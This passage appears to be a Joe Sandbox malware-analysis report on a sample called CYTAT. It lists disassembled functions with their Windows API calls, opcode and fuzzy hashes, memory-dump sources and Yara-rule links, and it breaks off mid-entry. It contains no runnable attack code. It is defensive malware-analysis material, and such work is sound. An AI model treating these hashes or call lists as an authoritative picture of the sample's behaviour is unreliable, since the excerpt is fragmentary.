                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcscpy$_wcscat
                                                • String ID:
                                                • API String ID: 2037614760-0
                                                • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Variant$Copy$AllocClearErrorLastString
                                                • String ID:
                                                • API String ID: 960795272-0
                                                • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                Download Yara Rule
                                                APIs
                                                • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                • EndPaint.USER32(?,?), ref: 00447D13
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                • String ID:
                                                • API String ID: 4189319755-0
                                                • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow$InvalidateRect
                                                • String ID:
                                                • API String ID: 1976402638-0
                                                • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$Show$Enable$MessageSend
                                                • String ID:
                                                • API String ID: 642888154-0
                                                • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Variant$Copy$ClearErrorLast
                                                • String ID: NULL Pointer assignment$Not an Object type
                                                • API String ID: 2487901850-572801152
                                                • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$Enable$Show$MessageSend
                                                • String ID:
                                                • API String ID: 1871949834-0
                                                • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                • SendMessageW.USER32 ref: 00471AE3
                                                • DestroyIcon.USER32(?), ref: 00471AF4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                • String ID:
                                                • API String ID: 3611059338-0
                                                • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: DestroyWindow$DeleteObject$IconMove
                                                • String ID:
                                                • API String ID: 1640429340-0
                                                • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                • _wcslen.LIBCMT ref: 004438CD
                                                • _wcslen.LIBCMT ref: 004438E6
                                                • _wcstok.LIBCMT ref: 004438F8
                                                • _wcslen.LIBCMT ref: 0044390C
                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                • _wcstok.LIBCMT ref: 00443931
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                • String ID:
                                                • API String ID: 3632110297-0
                                                • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Destroy$DeleteMenuObject$IconWindow
                                                • String ID:
                                                • API String ID: 752480666-0
                                                • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                • String ID:
                                                • API String ID: 3275902921-0
                                                • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                • String ID:
                                                • API String ID: 3275902921-0
                                                • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                • String ID:
                                                • API String ID: 2833360925-0
                                                • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32 ref: 004555C7
                                                • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                • DeleteObject.GDI32(?), ref: 00455736
                                                • DeleteObject.GDI32(?), ref: 00455744
                                                • DestroyIcon.USER32(?), ref: 00455752
                                                • DestroyWindow.USER32(?), ref: 00455760
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
